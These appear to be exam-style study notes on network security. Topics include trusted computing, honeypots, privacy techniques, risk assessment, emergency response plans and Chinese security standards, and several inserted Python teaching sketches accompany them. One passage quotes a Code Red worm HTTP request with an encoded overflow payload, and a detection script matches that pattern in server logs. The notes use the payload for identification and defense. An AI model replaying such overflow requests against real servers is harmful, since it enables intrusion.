malformed packet filtering, anti-denial of service attack, WEB application protection, DDOS high-defense IP service.

Common denial-of-service traffic includes SYN Flood, UDP Flood, ICMP Flood, DNS Query Flood, HTTP Get Flood, CC attacks and other network attack traffic.

The technical principle of trusted computing is to first build a root of trust and then establish a chain of trust, starting from the root of trust and extending to the hardware platform, to the operating system, and then to the application, with each level certifying the next and each level trusting the next. Trust is thereby extended to the entire computer system, ensuring the trustworthiness of the entire computer system. A trusted computer system consists of a trusted root, a trusted hardware platform, a trusted operating system and a trusted application system.


3. Components of a trusted computer system:
Trusted root - Trusted hardware platform - Trusted operating system - Trusted application system

The security chip (TPM) is an integrity measurement mechanism for the root of trust, which enables the integrity of components to be identified when the computing system platform is running and prevents tampering with the operation of computing components.

TPM is the root of trust of the trusted computing platform and a key component of trusted computing.
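The chain of trust and the integrity measurement above can be made concrete with the TPM extend operation, in which a register is updated as new = SHA-256(old || measurement), so each stage is measured before control passes to it. The following sketch is an added example, not part of the original notes; the component images, names and the verify() policy are constructed assumptions.

```python
import hashlib

PCR_RESET = bytes(32)  # the register starts as all zeros at platform reset

# Constructed boot chain in the order the notes give: hardware platform,
# operating system, application. The byte strings stand in for real images.
GOLDEN_CHAIN = [
    ("hardware platform firmware", b"firmware image (constructed)"),
    ("operating system", b"kernel image (constructed)"),
    ("application", b"application binary (constructed)"),
]


def measure(image):
    """Integrity measurement of one component: its SHA-256 digest."""
    return hashlib.sha256(image).digest()


def extend(pcr, measurement):
    """Fold a measurement into the register; the old value cannot be undone."""
    return hashlib.sha256(pcr + measurement).digest()


def measured_boot(chain):
    """Measure each stage before it runs; return the final PCR and event log."""
    pcr, log = PCR_RESET, []
    for name, image in chain:
        digest = measure(image)
        log.append((name, digest))
        pcr = extend(pcr, digest)
    return pcr, log


def replay(log):
    """Recompute the PCR a verifier expects from an event log."""
    pcr = PCR_RESET
    for _, digest in log:
        pcr = extend(pcr, digest)
    return pcr


def verify(reported_pcr, log, golden):
    """Return a list of findings; an empty list means the platform is trusted.

    golden maps component names to their known-good digests.
    """
    if replay(log) != reported_pcr:
        # The log was edited after the fact: it no longer explains the PCR.
        return ["event log does not match reported PCR"]
    return [name for name, digest in log if golden.get(name) != digest]


if __name__ == "__main__":
    golden = {name: measure(image) for name, image in GOLDEN_CHAIN}
    tampered = list(GOLDEN_CHAIN)
    tampered[1] = ("operating system", b"kernel image with implant (constructed)")
    for label, chain in (("clean", GOLDEN_CHAIN), ("tampered", tampered)):
        pcr, log = measured_boot(chain)
        print(label, pcr.hex()[:16], verify(pcr, log, golden))
```

Because each extend hashes the previous register value, a modified operating system changes the final value even when every later stage is untouched, and an attacker who swaps a clean log in for the real one is caught by the replay check.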

TCG defines the root of trust of the trusted computing platform to include three roots:
Trusted Metric Root RTM,
Trusted Storage Root RTS
Trusted Report Root RTR.
Among them, the trusted measurement root RTM is a software module; the trusted storage root RTS is composed of the trusted platform module TPM chip and the storage root key SRK; the trusted reporting root RTR is composed of the trusted platform module TPM chip and the root key EK.

Trusted computing is a core key technology of network information security. Based on independent cryptographic algorithms, China has established an independent trusted computing standard system with TCM as its core. The platform is mainly composed of two parts: the Trusted Cryptographic Module (TCM) and the TCM Service Module (TSM). Among them, the Trusted Cryptographic Module (TCM) is a key basic component necessary for the trusted computing cryptographic support platform, providing independent cryptographic algorithm support. TCM is a collection of hardware and firmware. It can take the form of an independent package, or it can be integrated with other types of chips in the form of an IP core to provide TCM functions.

Trusted computing applications
• Computing platform security protection: integrity measurement and inspection to prevent malicious code from tampering with the BIOS, operating system and application software
• Trusted network connection: identity authentication, integrity authentication
• Trusted verification

4. Trusted computing platform application:
Trusted Network Connect (TNC): uses TPM/TCM security chips to perform integrity measurement checks on key computer components, prevents tampering with the BIOS, operating system, and application software, and solves terminal security status authentication and post-access control.

Trusted Network Connect (TNC) uses TPM/TCM security chips to implement platform identity authentication and integrity verification, thereby solving the terminal's security status authentication and post-access control issues.

The TNC structure is divided into:
Integrity measurement layer: responsible for collecting and verifying the integrity information of the AR.
Integrity evaluation layer: evaluating the integrity status of AR based on security policies.
Network access layer: security policy enforcement, access authorization.

TPM is the root of trust of the trusted computing platform and an important component of trusted computing.

TCG defines the trusted computing platform root of trust to include:
Trusted measurement root RTM: It is a software module
Trusted storage root RTS: Trusted platform module TPM chip, storage root key SRK
Trusted reporting root RTR: Trusted platform module TPM chip, trusted key EK

The principle of digital watermarking is to embed specific marks in digital media files through digital signal processing methods. Watermarks are divided into two types: perceptible and imperceptible.

5. Digital watermarks are divided into perceptible watermarks and imperceptible watermarks.
Watermark embedding methods: spatial domain method, transformation domain method.

6. Watermark application scenarios:
copyright protection, information hiding, information traceability, and access control.
Copyright digital watermark requirements include: concealment, security, and robustness.
Robustness: The watermark added to the image must be able to withstand transformation operations and must not be lost because of transformation processing.
Robust attacks: pixel distortion attack, sensitivity analysis attack, gradient descent attack.

There are four types of watermark attacks: robust attacks, expressive attacks, interpretive attacks, and legal attacks. The first three are technical attacks.

7. Network trap technologies (network deception) include: honeypot host technology and trap network technology.
Honeypot technology: empty system (standard host, running operating system and applications), mirror system, virtual system (running multiple virtual machines in virtual machine software, virtual machines installing different operating systems, special software honeyd)

8. Network attack trap technology consists of: multiple honeypot hosts, routers, firewalls, IDS, and audit systems. Create an attack environment for the attacker for the defender to study the attacker's attack behavior. Trap networks generally need to implement functions such as honeypot systems, data control systems, data capture systems, data recording, data analysis, and data management.

Honeypot systems do not directly improve security levels.

Application of network attack trap technology:
Malicious code monitoring: Analyze the network traffic of honeypot nodes and the number of malicious codes in the system to discover advanced malicious codes.
Enhance anti-attack capabilities: Use network attack traps to interfere with attack activities with false targets to delay network attacks.
Network situational awareness: Use big data for analysis to obtain attack behavior characteristics and sources.

In the first generation of trap networks, data packets entering and leaving the trap network pass through a firewall and a router. The function of the firewall is to control the communication connections between the internal and external networks and prevent the trap network from being used as a springboard to attack other systems. Its rules are generally configured not to restrict external network access to the trap network, but control over the outbound connections of the honeypot hosts in the trap network must be strengthened, including restricting the destinations of outbound connections, restricting actively initiated outbound connections, and restricting the protocol types of outbound connections. The router is placed between the firewall and the trap network, where it can hide the firewall. Even if the attacker controls the honeypot host in the trap network and finds that the router is connected to the external network, it can be discovered by the firewall. At the same time, the router has access control functions that can make up for the shortcomings of the firewall, such as preventing address spoofing attacks, DoS, and ICMP-based attacks. The data capture device of a trap network is an IDS, which monitors and records communication connections in the network and raises alerts on suspicious network activity. In addition, to understand the attacker's behavior on the honeypot host, system activity records must be obtained. There are two methods: first, have all system logs not only recorded locally but also sent to a remote log server; second, install monitoring software to record keystrokes, screen copies, system call records, etc., and transmit them to a remote host.
The second generation of trap network technology integrates the data control system and the data capture system into one system, which makes installation and management easier, as shown in Figure 15-17. Its advantages include:
first, it can monitor unauthorized activities;
second, it is more concealed;
third, it can use active response methods to limit the effects of illegal activities, such as modifying the attack code bytes to make the attack ineffective.
Currently, researchers are developing virtual honeynets, which integrate the honeypot system, data control system, data capture system, data recording and other functions into a single physical device. This is called the third generation of trap network technology.
Open source network attack trap systems include Honeyd, the industrial control system honeypot Conpot, the password honeypot Honeywords, etc.

Situation awareness: Combining anti-virus software, firewalls, intrusion detection systems, and security audits to evaluate the entire network situation and predict future trends.
Four parts: data collection, feature extraction, situation assessment, and security warning.
Contents: 1. Perceive network assets; 2. Perceive asset vulnerability; 3. Perceive security events; 4. Perceive network threats; 5. Perceive network attacks; 6. Perceive security risks.

9. Intrusion tolerance 3R strategy: resistance, recognition, and recovery.
The concept of Security 1.0 is to keep intruders out of the protected system; the concept of Security 2.0 is to detect network security threats, prevent network security threats, and achieve network security isolation; and the concept of Security 3.0 is to tolerate intrusions, respond to network security threats, and make victimized systems recoverable.

The blockchain is composed of many peer nodes, using consensus mechanisms and cryptographic algorithms to maintain the integrity and consistency of block data and transactions, forming a unified distributed ledger. Blockchain is a decentralized distributed database, and data security has strong intrusion tolerance.

10. Privacy protection types can be divided into:
Identity privacy: the user’s true identity information.
Attribute privacy: personal attribute characteristics such as age, gender, and salary.
Social relationship privacy: social information that users are unwilling to disclose.
Location track privacy: activity track information.

From the perspective of data mining, privacy protection technologies can be divided into:
based on data distortion, based on data encryption, and based on data anonymization.

Privacy protection method:
K-anonymity: All metadata is generalized, so that the data no longer corresponds one-to-one to any individual.
Differential privacy method: Add random noise to the private data so that the attacker cannot deduce the real information.

Currently, common technical measures for privacy protection include suppression, generalization, replacement, perturbation, and clipping.
Suppression limits data release by leaving data blank.
Generalization provides anonymity by reducing data accuracy.
Replacement changes the owner of the data.
Perturbation adds a certain amount of noise when releasing data, including adding, deleting, and transforming data, so that the attacker cannot distinguish real data from noise data and is thereby interfered with.
Clipping releases sensitive data separately.
In addition, cryptography is also used to achieve privacy protection: encryption technology prevents unauthorized access to and misuse of private data by illegal users.
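Generalization, suppression, the k-anonymity check and the noise added by differential privacy can be seen working together on a small table. The following sketch is an added example, not part of the original notes; the records, bucket sizes and function names are constructed assumptions, and the noise uses the Laplace mechanism, one standard way to add random noise that the notes do not name.

```python
import random
from collections import Counter

# Constructed records: (age, postcode, diagnosis). Age and postcode are the
# quasi-identifiers; diagnosis is the sensitive attribute.
RECORDS = [
    (23, "100081", "flu"), (27, "100083", "asthma"), (25, "100085", "flu"),
    (34, "100201", "diabetes"), (36, "100204", "flu"), (38, "100207", "asthma"),
    (52, "200030", "diabetes"),
]


def generalize(record, age_bucket=10, keep_digits=3):
    """Reduce accuracy: age becomes a range, postcode keeps only a prefix."""
    age, postcode, sensitive = record
    low = age // age_bucket * age_bucket
    masked = postcode[:keep_digits] + "*" * (len(postcode) - keep_digits)
    return (f"{low}-{low + age_bucket - 1}", masked, sensitive)


def k_of(table):
    """Size of the smallest group sharing the same quasi-identifier values."""
    groups = Counter((age, postcode) for age, postcode, _ in table)
    return min(groups.values()) if groups else 0


def anonymize(records, k):
    """Generalize every record, then suppress rows in groups smaller than k."""
    table = [generalize(r) for r in records]
    groups = Counter((age, postcode) for age, postcode, _ in table)
    kept = [row for row in table if groups[(row[0], row[1])] >= k]
    return kept, len(table) - len(kept)


def noisy_count(records, predicate, epsilon, rng):
    """Counting query with Laplace noise of scale 1/epsilon (sensitivity 1)."""
    true_count = sum(1 for r in records if predicate(r))
    # The difference of two exponentials with rate epsilon is Laplace(0, 1/epsilon).
    noise = rng.expovariate(epsilon) - rng.expovariate(epsilon)
    return true_count + noise


if __name__ == "__main__":
    print("k before:", k_of(RECORDS))
    kept, suppressed = anonymize(RECORDS, k=3)
    print("k after:", k_of(kept), "suppressed rows:", suppressed)
    flu = noisy_count(RECORDS, lambda r: r[2] == "flu", 0.5, random.Random(7))
    print("noisy flu count:", round(flu, 2))
```

The single record in the 50-59 group cannot reach k = 3 by generalization alone, so it is suppressed rather than released.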

11. Common personal information application protection scenarios:
Anonymize personal information: use asterisks to represent ID card names and ID numbers.
De-identify personal information: use pseudonyms or hash functions.


12. Common risks of domain names:
domain name hijacking,
domain name information tampering,
domain name resolution configuration errors,
domain name software security vulnerabilities

16. Network security risk refers to the vulnerability of the network.

1. Three network risk assessment models: self-assessment, inspection assessment, and entrusted assessment

Risk elements
Basic elements: assets, vulnerabilities, threats, risks, security measures.

Four processes of risk assessment:
risk assessment preparation, risk factor identification, risk degree analysis and risk level evaluation

Risk assessment does not belong to the information security risk assessment and identification stage

Assuming that the probability of a website being attacked by a hacker is 0.8 and the economic impact is RMB 20,000, the company's website security risk quantification value is RMB 16,000.
Measured based on three basic security attributes of assets, namely confidentiality, integrity and availability

2. Vulnerability assessment takes assets as the core. Vulnerability assessment is divided into two types:
technical vulnerability assessment and management vulnerability assessment.

3. Network security analysis steps:
1. Identify assets and determine their value.
2. Identify threats and assign values to the frequency of threats.
3. Identify vulnerabilities and assign values to the severity of the vulnerabilities.
4. Determine the probability of occurrence based on the threats and the difficulty of exploiting the vulnerabilities.
5. Assess the value of asset loss based on the threats and vulnerabilities.
6. Calculate the impact on the organization after a security incident occurs, which is the network security risk value.

4. The national information risk assessment standard divides the confidentiality, integrity and availability of assets into five levels. The higher the level, the more important the asset is.

5. Five levels of asset availability for value estimation:
1 Very low: Normal availability is less than 25%
2 Low: Normal availability is more than 25%, or system interruption is less than 60 minutes
3 Medium: Normal availability is more than 70%, or system interruption is less than 30 minutes
4 High: Normal availability is more than 90% per day, or system interruption is less than 10 minutes.
5 Very High: Normal availability is more than 99.9% per year, and the system does not allow interruption.


Value estimation is not the actual economic value of the asset, but its relative value, which is generally measured based on the three basic security attributes of the asset, namely confidentiality, integrity and availability. The result of the value estimation is determined by the impact on the asset itself and its related businesses when the asset's security attributes are not met. Currently, the national information risk assessment standards divide the confidentiality, integrity and availability of assets into five levels. The higher the level, the more important the asset is.

6. Threat sources can generally be divided into natural threats and man-made threats according to their nature. Natural threats include lightning, floods, earthquakes, fires, etc., while man-made threats include theft, destruction, cyber attacks, etc. Threat effects are abstracted into three types: illegal access, deception, and denial of service. Depending on the identity of the threat actor, threat intent can be divided into challenge, intelligence information acquisition, terrorism, financial gain, and retaliation.

Threat frequency is assigned five levels:
1 Very Low: The threat is almost impossible to occur.
2 Low: The frequency is small and unlikely to occur.
3 Medium: Threat is more than once in half a year
4 High: Threat is more than once a month
5 Very High: Threat is more than once a week

The following is a comparison table of threat possibility assignments.

Generally speaking, vulnerability identification takes assets as the core.
Technical vulnerability assessment: mainly evaluates the rationality and effectiveness of existing security technical measures.
Management vulnerability assessment: analyzes and evaluates existing security vulnerabilities from the perspective of network information security management, and identifies their severity.

Cybersecurity risk analysis: on the basis of asset assessment, threat assessment, vulnerability assessment, security management assessment, and security impact assessment, qualitative and quantitative analysis methods are used together, and appropriate risk calculation methods or tools are selected, to determine the size of the risk and the risk level.

There are two methods for calculating network security risks: multiplication method and matrix method.
Multiplication method: possibility of the security incident × loss caused by the security incident = risk value.
Matrix method: a two-dimensional matrix is used to identify the possibility and correlation of security events.

[Figures: multiplication example; vulnerability severity]

7. Network security analysis methods mainly include: qualitative analysis, quantitative analysis, and combination of qualitative and quantitative analysis.

1. Qualitative calculation method: the relevant attributes of assets, threats, vulnerabilities and other elements of the risk assessment are evaluated subjectively, and the risk calculation result is then given.
2. Quantitative calculation method: assets, threats, vulnerabilities, etc. are quantified into data, and risks are then calculated quantitatively, usually presented in terms of economic losses, scope of impact, etc. In practice, however, it is difficult to accurately quantify assets, threats, vulnerabilities, and the losses from security incidents, so a fully quantitative calculation method is not feasible. The output of quantitative calculation methods is a risk value.
3. Comprehensive calculation method: combines qualitative and quantitative methods. Values are assigned quantitatively to the elements of the risk assessment such as assets, threats, vulnerabilities, and security incident losses, and an appropriate calculation method is then selected for the risk calculation.

8. Security risk management control measures:
develop clear security policies,
establish security organizations,
carry out asset classification control,
strengthen personnel security management,
ensure the security of physical entities and environments,
strengthen communication security,
adopt access control mechanisms,
develop and maintain security systems,
ensure continuous business operation,
comply with laws and regulations.

9. Before the network security risk assessment, a confidentiality agreement must be signed, sensitive systems must be tested, at least 2 people must participate in the assessment, and the leader must sign for confirmation.

OWASP risk assessment method reference. OWASP is a research organization for Web application security. Its risk assessment divides scores into: 0-3 low, 3-6 medium, and 6-9 high.
The OWASP risk assessment method it recommends is divided into the following steps:
Step 1: determine the risk category;
Step 2: assess the likelihood factors;
Step 3: assess the impact factors;
Step 4: determine the risk severity;
Step 5: decide what to fix;
Step 6: customize an appropriate risk rating model.
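
The scoring behind steps 2 to 5, as an added example (not from the original notes): the factor names and the severity matrix follow the public OWASP Risk Rating Methodology, the 0-3/3-6/6-9 bands are the ones given above, and the sample scores are constructed.

```python
from statistics import mean

# Factor names follow the OWASP Risk Rating Methodology; each factor is scored 0-9.
THREAT_AGENT = ("skill_level", "motive", "opportunity", "size")
VULNERABILITY = ("ease_of_discovery", "ease_of_exploit", "awareness", "intrusion_detection")
TECHNICAL_IMPACT = ("loss_of_confidentiality", "loss_of_integrity",
                    "loss_of_availability", "loss_of_accountability")
BUSINESS_IMPACT = ("financial_damage", "reputation_damage", "non_compliance",
                   "privacy_violation")

# Step 4 lookup: SEVERITY[impact level][likelihood level].
SEVERITY = {
    "HIGH":   {"LOW": "Medium", "MEDIUM": "High",   "HIGH": "Critical"},
    "MEDIUM": {"LOW": "Low",    "MEDIUM": "Medium", "HIGH": "High"},
    "LOW":    {"LOW": "Note",   "MEDIUM": "Low",    "HIGH": "Medium"},
}
ORDER = ["Critical", "High", "Medium", "Low", "Note"]


def average(scores, names):
    """Average the named factors, rejecting anything outside the 0-9 scale."""
    values = []
    for name in names:
        value = scores[name]
        if not 0 <= value <= 9:
            raise ValueError(f"{name}={value} is outside the 0-9 scale")
        values.append(value)
    return mean(values)


def level(score):
    """Bands from the notes: 0-3 low, 3-6 medium, 6-9 high (lower bound inclusive)."""
    if score < 3:
        return "LOW"
    if score < 6:
        return "MEDIUM"
    return "HIGH"


def rate(scores):
    """Steps 2-4: likelihood, impact, then overall severity."""
    likelihood = average(scores, THREAT_AGENT + VULNERABILITY)
    technical = average(scores, TECHNICAL_IMPACT)
    # Business impact takes precedence when the organization can estimate it;
    # otherwise the technical impact is used.
    if all(name in scores for name in BUSINESS_IMPACT):
        impact, basis = average(scores, BUSINESS_IMPACT), "business"
    else:
        impact, basis = technical, "technical"
    return {
        "likelihood": likelihood,
        "likelihood_level": level(likelihood),
        "impact": impact,
        "impact_basis": basis,
        "impact_level": level(impact),
        "severity": SEVERITY[level(impact)][level(likelihood)],
    }


def prioritize(findings):
    """Step 5: order finding names from most to least severe."""
    rated = {name: rate(scores) for name, scores in findings.items()}
    return sorted(rated, key=lambda n: (ORDER.index(rated[n]["severity"]),
                                        -rated[n]["likelihood"]))


# Constructed sample finding (scores are illustrative only).
SAMPLE_FINDING = {
    "skill_level": 5, "motive": 2, "opportunity": 7, "size": 1,
    "ease_of_discovery": 3, "ease_of_exploit": 6, "awareness": 9,
    "intrusion_detection": 2,
    "loss_of_confidentiality": 9, "loss_of_integrity": 7,
    "loss_of_availability": 5, "loss_of_accountability": 8,
    "financial_damage": 1, "reputation_damage": 2, "non_compliance": 1,
    "privacy_violation": 5,
}

if __name__ == "__main__":
    print(rate(SAMPLE_FINDING))
```

The same finding rates "Low" when its business impact is known and "High" when only the technical impact is scored, which is why step 6 (tuning the model to the organization) matters.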

Web page anti-tampering methods: time polling, core embedding, file filtering driver

The main objectives of ICT supply chain risk management are as follows:
• Integrity. Ensure that in all aspects of the ICT supply chain, products, systems, services and the components, parts, data, etc. contained therein are not implanted, tampered with, replaced or counterfeited.
• Confidentiality. Ensure that information passed along the ICT supply chain is not leaked to unauthorized parties.
• Availability. Ensure that demanders' access to the ICT supply chain is not unreasonably denied.
• Controllability. Controllability refers to the demander's ability to control ICT products, services or supply chains.
The ICT supply chain mainly faces five types of security threats: malicious tampering, counterfeiting, supply interruption, information leakage or illegal operations, and other threats.
The industrial control system platform is composed of industrial control system hardware, operating systems and application software.


  1. Security Risks of Artificial Intelligence Training Data
    Researchers have found that mixing a small number of malicious samples into the training samples can greatly disrupt the accuracy of the AI model. This attack method is called a bait attack.

  2. Artificial intelligence algorithm security risks
    A specially designed printed pattern can be used to evade an artificial intelligence video surveillance system; by modifying the physical road sign, the AI road sign recognition algorithm can be made to recognize a "No Passage" road sign as "Speed Limit 45"; a backdoor can be embedded in the AI algorithm model so that it is triggered only when the input image contains a specific pattern.

  3. Security Risks of Code Implementation of Artificial Intelligence Systems
    Both artificial intelligence systems and algorithms rely on the correct implementation of thousands of lines of code. Currently, there are unknown security vulnerabilities in open source learning frameworks, which can lead to data leakage or loss of control of intelligent systems. For example, deep learning frameworks such as TensorFlow, Caffe, and Torch and the libraries they depend on have security vulnerabilities. Multiple TensorFlow CVE vulnerabilities have been published on the CVE website. Attackers can use related vulnerabilities to tamper with or steal intelligent system data.

  4. Risks of misuse of artificial intelligence technology
    Artificial intelligence technology excessively collects personal data and automatically learns and infers services, leading to an increased risk of privacy leaks.
    In August 2018, Tencent's security team discovered a backdoor in Amazon's smart speakers that could enable remote eavesdropping and recording. Deep learning can be used to mine and analyze data resources to generate realistic false information content, threatening network security, social security and national security. Cybersecurity threat actors use intelligent recommendation algorithms to identify potential vulnerable target groups, deliver customized information content and phishing emails, and accelerate the spread of bad information and the accuracy of social engineering attacks.

  5. Highly autonomous intelligent systems lead to social security risks
    The abnormal operation of intelligent systems such as autonomous driving and drones may directly harm human health and life safety.
    For example, a certain brand of car with the autonomous driving function turned on was unable to recognize a white truck against a blue sky background, causing a car accident that resulted in the death of the driver. The widespread use of intelligent robots has forced the reduction of a large number of mechanical and repetitive jobs, causing employment competition issues between robots and natural persons and social equity issues.

10. Network security evaluation project process:
preparation before evaluation - design of evaluation plan - implementation of evaluation plan - writing of evaluation report - recognition of evaluation results.

Cybersecurity response organization types: non-profit, commercial, internal, vendor.


A large number of HTTP requests similar to the following appear in the access log on a website server:
"GET/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNN %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090% u6858 %ucbd3%u7801 %u9090%u9090%u8190%u00c3%u0003%u8b00%u53lb%u53ff%u0078%u00 00%u00=a HTTP/1.0”
Based on this log information, we can infer that the website was attacked by the Code Red worm.
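
A detection sketch for the request pattern above, as an added example (not from the original notes): it flags `.ida` requests whose query string combines a long run of one padding character with several `%uXXXX` encoded words, and counts hits per source address. The two thresholds and the log lines are constructed assumptions.

```python
import re
from collections import Counter

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
ENCODED_WORD = re.compile(r"%u[0-9a-fA-F]{4}")
SAME_CHAR_RUN = re.compile(r"(.)\1*")

MIN_PADDING_RUN = 100    # assumption: far longer than any legitimate parameter
MIN_ENCODED_WORDS = 4    # assumption: several %uXXXX words in one query


def longest_run(text):
    """Length of the longest run of one repeated character."""
    return max((len(m.group(0)) for m in SAME_CHAR_RUN.finditer(text)), default=0)


def is_ida_overflow_probe(target):
    """True when the request target matches the pattern shown in the notes."""
    path, _, query = target.partition("?")
    if not path.lower().endswith(".ida"):
        return False
    return (longest_run(query) >= MIN_PADDING_RUN
            and len(ENCODED_WORD.findall(query)) >= MIN_ENCODED_WORDS)


def scan(lines):
    """Count matching requests per source address."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_ida_overflow_probe(m.group("target")):
            hits[m.group("ip")] += 1
    return hits


# Constructed log lines; the encoded words are the ones quoted in the notes.
PAD = "N" * 224
ENC = "%u9090%u6858%ucbd3%u7801" * 3
SAMPLE_LOG = [
    f'203.0.113.7 - - [19/Jul/2001:10:00:01 +0000] "GET /default.ida?{PAD}{ENC}%u00=a HTTP/1.0" 404 -',
    f'203.0.113.7 - - [19/Jul/2001:10:00:09 +0000] "GET /default.ida?{PAD}{ENC}%u00=a HTTP/1.0" 404 -',
    '198.51.100.20 - - [19/Jul/2001:10:00:12 +0000] "GET /index.html HTTP/1.0" 200 5120',
    '198.51.100.20 - - [19/Jul/2001:10:00:15 +0000] "GET /default.ida?query=report HTTP/1.0" 404 -',
    f'192.0.2.99 - - [19/Jul/2001:10:01:30 +0000] "GET /default.ida?{PAD}{ENC}%u00=a HTTP/1.0" 200 -',
]

if __name__ == "__main__":
    for ip, count in scan(SAMPLE_LOG).most_common():
        print(ip, count)
```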




17. The policy of the National Internet Emergency Response Center (CNCERT) is: active prevention, timely detection, rapid response, and efforts to ensure recovery.

Article 8 of the "Cybersecurity Law of the People's Republic of China" stipulates that the national cybersecurity and informatization department is responsible for the overall coordination of network security work and related supervision and management work. The telecommunications department under the State Council, the public security department and other relevant agencies shall be responsible for network security protection, supervision and management within the scope of their respective responsibilities in accordance with the provisions of this Law and relevant laws and administrative regulations. The network security protection and supervision and management responsibilities of relevant departments of local people's governments at or above the county level shall be determined in accordance with relevant national regulations.

For matters where it is unclear whether they are state secrets or what level of confidentiality they belong to, the agency or unit where the matter arose must apply for confirmation within 10 days.

1. Cybersecurity emergency response work:
cyber security threat intelligence analysis,
cyber security incident monitoring,
cyber security early warning information release,
emergency response plan preparation,
emergency response knowledge base development and management,
emergency response drills,
emergency incident handling,
cyber security emergency result analysis and summary,
cyber security education and training.

2. The national network emergency plan classifies network security incidents into four levels:
extremely serious,
major,
relatively major,
and general: posing a certain threat to national security and social order.

3. When the integrity of the portal website is damaged, activate the first-level plan:
Immediately disconnect the website server from the Internet.
Isolate the attacked website server and protect the site.
Let website professionals perform data recovery.
Trace the source of the attack, and report to the superior department or call the police.

The main characteristic of DoS attacks is extending the service waiting time.

The characteristics of DoS attacks are: difficulty in confirmation, concealment, limited resources, and software complexity.

4. When the portal or mail server is attacked by DDoS, start the secondary plan:
Use a firewall to block the source of the attack.
Change the DNS resolution to divert the denial of service attack.
Record the current connection status and save relevant logs.
If the above procedures still cannot solve the problem, disconnect the website from the Internet and alert the superior authority or the public security department.
Resolve the emergency with the assistance of the Internet management department and the public security department.

5. When the portal or email system is attacked by hackers, activate the secondary plan:
Immediately disconnect the website server from the Internet.
Use a firewall to block the source of the attack.
Record the current connection status and save the log.
Trace the source of the attack, and report or alert the superior department.
Let website professionals perform data recovery.

6. After the external power supply is interrupted, the secondary plan is also activated.

7. Network security emergency response process:
security incident alarm (personnel on duty - emergency team leader - emergency leadership group),
security incident confirmation,
activation of emergency plan,
security incident handling (at least 2 people participating; preparation, detection, suppression, eradication, recovery, summary),
writing a security incident report (date of the security incident, participants, how the incident was discovered, type of incident, scope of the incident, on-site records, resulting losses and impacts, handling process, lessons learned),
emergency work summary.

8. Six steps for security evidence collection:
protection of the evidence collection scene, identification of evidence, transmission of evidence, preservation of evidence, analysis of evidence, and submission of evidence.

Cyber security incident emergency drills are simulated responses to hypothetical cyber security incidents to confirm the effectiveness of the emergency response working mechanism and cyber security incident plans.
Cyber security incident emergency drills are classified as follows:
by organizational form: desktop emergency drills and actual emergency drills;
by content: single emergency drills and comprehensive emergency drills;
by purpose and function: test emergency drills, demonstration emergency drills and research emergency drills.

In response to the problem of disaster recovery of network information systems, the country formulated and promulgated the "Information Security Technology Information System Disaster Recovery Specification (GB/T 20988-2007)", which defines six disaster recovery levels and technical requirements. The requirements are as follows:
• Level 1 - Basic support. This level requires a complete data backup at least once a week, with the backup media stored off-site; a suitable venue for media storage is also required; the enterprise must develop a management system for media access, verification and dumping, and regularly verify the validity of the backed-up data according to the media characteristics; the enterprise needs to develop disaster recovery plans that have been fully tested and drilled.
• Level 2 - Alternate site support. On the basis of Level 1, Level 2 also requires data processing equipment, communication lines and corresponding network equipment that can be deployed and used within a predetermined time after a disaster occurs; the site where media are stored must be able to meet the requirements for the recovery and operation of information systems and key business functions; corresponding requirements have also been added for the enterprise's operation and maintenance capabilities, that is, a backup site management system must be developed, and there must be emergency supply agreements and backup communication line agreements with relevant manufacturers and operators that meet the disaster recovery time requirements.
• Level 3 - Electronic transmission and partial equipment support. Unlike Level 2, which deploys data processing equipment and has an emergency supply agreement for network systems, Level 3 requires some data processing equipment, some communication lines and corresponding network equipment to be configured; it also requires key data to be transferred to the backup site in batches, on a regular basis, multiple times a day over the communication network, with full-time operation and management personnel assigned to the disaster backup center. For operation and maintenance, an operation and management system for the electronic transmission data backup system must be developed.
• Level 4 - Electronic transmission and complete equipment support. Compared with Level 3, which is equipped with some data processing equipment and network equipment, Level 4 must be equipped with all data processing equipment, communication lines and network equipment required for disaster recovery, all in a ready state; the backup site is also subject to higher requirements, supporting 7×24-hour operation, and the requirements for technical support and operation and maintenance management are correspondingly higher.
• Level 5 - Real-time data transmission and full equipment support. Compared with the electronic transmission of data at Level 4, Level 5 requires the implementation of remote data replication technology and the use of communication networks to copy key data to a backup site in real time; it also requires the backup network to have automatic or centralized switching capabilities.
• Level 6 - Zero data loss and remote cluster support. Compared with the real-time data replication of Level 5, Level 6 requires remote real-time backup of data to achieve zero data loss; it also requires application software to be clustered and capable of real-time seamless switching, with real-time monitoring and automatic switching capability for the remote cluster system; the requirements for the backup network are also strengthened, requiring that users can access the primary and backup centers through the network at the same time.

18.

In 1999, our country promulgated the "Guidelines for Classification of Security Protection Levels of Computer Information Systems" (GB 17859-1999). In terms of autonomous access control, mandatory access control, identity authentication, data integrity, object reuse, auditing, marking, covert channel analysis, trusted path and trusted recovery, it divides the security protection capabilities of computer information systems into five levels:
the first level is the user independent protection level;
the second level is the system audit protection level;
the third level is the security mark protection level;
the fourth level is the structured protection level;
the fifth level is the access verification protection level.
System audit protection level: finer-grained autonomous access control, audit security.
Security mark protection level: implements mandatory access control on all subjects and controlled objects.
Structured protection level: considers covert channels.

In 2001, with reference to the international Common Criteria (CC) and the international standard ISO/IEC 15408, my country issued the "Information Technology Security Technology Information Technology Security Assessment Guidelines" (GB/T 18336-2001).
GB/T 18336-2001 (CC) is divided into three parts:
"Part 1: Introduction and general model"
"Part 2: Security functional requirements"
"Part 3: Security assurance requirements".

In 2008, based on foreign information security evaluation standards, my country established its own system of information system security level protection standards.

SC27 (Sub-Technical Committee for Information Security General Methods and Technology Standardization Work)
Working Group 1 (WG1): Requirements, Security Services and Guidelines Working Group
Working Group 2 (WG2): Security Technology and Mechanism Working Group
Working Group 3 (WG3): Security Assessment Criteria Working Group

2. There are three types of network security assessment: security level assessment, security acceptance assessment, and security risk assessment.
Classification based on assessment content: technical assessment and management assessment.
Classification based on the confidentiality of the assessment object: confidential information systems and non-confidential information systems.

